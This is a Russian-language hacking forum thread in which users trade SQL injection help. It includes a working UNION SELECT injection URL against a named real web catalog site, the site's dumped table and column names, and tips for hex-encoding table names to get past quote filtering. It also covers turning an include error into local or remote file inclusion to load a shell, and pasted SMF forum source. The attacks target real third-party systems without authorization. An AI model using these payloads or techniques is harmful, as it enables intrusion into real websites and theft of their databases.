так там всего 3 поля, откуда ты 17 то взял? Вот в виде table_schema,table_name,column_name: Code: webkat_baze:0links:id webkat_baze:0links:name webkat_baze:0links:text webkat_baze:0links:url webkat_baze:0links:date1 webkat_baze:0links:date2 webkat_baze:kat:id webkat_baze:kat:name webkat_baze:links_partner:date webkat_baze:links_partner:links webkat_baze:links_partner:id webkat_baze:site:id webkat_baze:site:kat webkat_baze:site:subkat webkat_baze:site:url webkat_baze:site:name webkat_baze:site:info webkat_baze:site:keywords webkat_baze:site:status webkat_baze:site:date webkat_baze:site:date2 webkat_baze:site:iphost webkat_baze:site:view webkat_baze:site:user webkat_baze:site:email webkat_baze:site:nashbutton webkat_baze:site:ocenka webkat_baze:site:tmp2 webkat_baze:subkat:id webkat_baze:subkat:kat webkat_baze:subkat:name
http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1%20union%20select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17%20from%20information_schema.columns+where+table_name=0x555345525f50524956494c45474553+--&page=1
Все там отлично выводится, принтабельное поле после слов: Каталог > Авто/мото > Смотри выше, я выложил в пред идущем посте таблицы и колонки
Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name=%27user%27+-- не катит?)
нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
Чтобы руками не перебирать все, юзаем sipt. но КТО НЕ ЗНАЕТ КАК СДЕЛАТЬ РУКАМИ ИНЕКЦИЮ НЕ ЮЗАЙТЕ СИПТ! Если что-то делать, так с умом.
там есть табла юзер =) Но да, кавычки фильтруются - нужно хексить или чарить =) а сипт ненуюно юзать - там 5 версия, всё и атк просто
__http://www.xakep.ru/post/45088/default.asp народ ..тут видео как чел нашел багу в SMF 1.1.4, он использует прогу Odysseus не подскажите в чем у меня косяк , когдая вроде делаю все тоже самое тока у меня почему то не вылезают те ошибки которые у него ?? P.S. мб я скачал уже пропатченную версию?, хотя код вроде тот же самый что и у него......юзаю оперу Code: // Let's not depend on the ini settings... why even have COOKIE in there, anyway? $_REQUEST = $_POST + $_GET; // Make sure $board and $topic are numbers. if (isset($_REQUEST['board'])) { // Make sure that its a string and not something else like an array $_REQUEST['board'] = (string) $_REQUEST['board']; // If there's a slash in it, we've got a start value! (old, compatible links.) if (strpos($_REQUEST['board'], '/') !== false) list ($_REQUEST['board'], $_REQUEST['start']) = explode('/', $_REQUEST['board']); // Same idea, but dots. This is the currently used format - ?board=1.0... elseif (strpos($_REQUEST['board'], '.') !== false) list ($_REQUEST['board'], $_REQUEST['start']) = explode('.', $_REQUEST['board']); // Now make absolutely sure it's a number. $board = (int) $_REQUEST['board']; // This is for "Who's Online" because it might come via POST - and it should be an int here. $_GET['board'] = $board; } // Well, $board is going to be a number no matter what. else $board = 0; // If there's a threadid, it's probably an old YaBB SE link. Flow with it. if (isset($_REQUEST['threadid']) && !isset($_REQUEST['topic'])) $_REQUEST['topic'] = $_REQUEST['threadid']; // We've got topic! if (isset($_REQUEST['topic'])) { // Make sure that its a string and not something else like an array $_REQUEST['topic'] = (string)$_REQUEST['topic']; // Slash means old, beta style, formatting. That's okay though, the link should still work. if (strpos($_REQUEST['topic'], '/') !== false) list ($_REQUEST['topic'], $_REQUEST['start']) = explode('/', $_REQUEST['topic']); // Dots are useful and fun ;). This is ?topic=1.15. elseif (strpos($_REQUEST['topic'], '.') !== false) list ($_REQUEST['topic'], $_REQUEST['start']) = explode('.', $_REQUEST['topic']); $topic = (int) $_REQUEST['topic']; // Now make sure the online log gets the right number. $_GET['topic'] = $topic; } если что прога вот __http://komm.gaz.ru/doka/doc/online/XAKER/Xaker01_2009_dvd/files/soft/Windows/Security/Odysseus%202.0.0.84/Odysseus-2-0-0-84.exe
При добавлении кавычки ' (/index.php?page=19') вылитает такая ошибка: Code: Warning: require(.dat) [function.require]: failed to open stream: No such file or directory in /home/host.ru/public_html/index.php on line 46 Fatal error: require() [function.require]: Failed opening required '.dat' (include_path='.:/usr/lib/php') in /home/host.ru/public_html/index.php on line 46 Я в скуль иньекциях ток пытаюсь разобратся, подскажите что в данном случае можно сделать?
в данном случае это не sql-inj а php инклуд. т.е. вы можете попробовать поинклудить (просмотреть) файл на сервере (LFI) либо можете проинклудить шелл с удаленного сервера (RFI) доп.информацию можете почитать в соседних топиках, там всё это есть.
Является ли такой запрос опасным? (в плане sql-inj) "SELECT ... WHERE `id` = '".(int)$_GET['id']."'" Если да то как примерно все это реализовывается? (там же токо число выводят, если get запрос будет таким id=9999+union+... то наврятли что-то выполнится(sql))
Но в плане раскрытия путей может быть опасно, т.к. не предотрващает отрицательного значения данных, хотя я скорее всего неправ, и даже наверняка, думаю поправят, если что
врятли там получится раскрытие путей ))так как Int значение может иметь и отрицательное и положительное (вроде так))))..а если в плане и раскроется путь, то без SQL-inj и mysql.user с MQ=off и f_p = Y и папкой на запись))) смысла ни какого))...будет смысл если тока есть все это на другом сайте с одним IP то можно будет попробовать использовать этот путь с подстановкой того сайта P.S если не прав тоже поправте
Не обязательно на одном IP, и что вы все надеетесь на SQL-inj и mysql.user с MQ=off и f_p = Y есть куча других моментов где могут пригодиться пути при заливке шелла, и при выводе ошибок вполне возможно раскрытия пути при не верном SQL запросе или например без проверки на то что вернул запрос и обработка их соотвествуюшими функциями(mysql_fetch_array и etc.) которые могу сгенерировать ошибку.
если ты понял что ты сам написал то пример в студию P.S. прочти на какой вопрос был дан ответ , умник
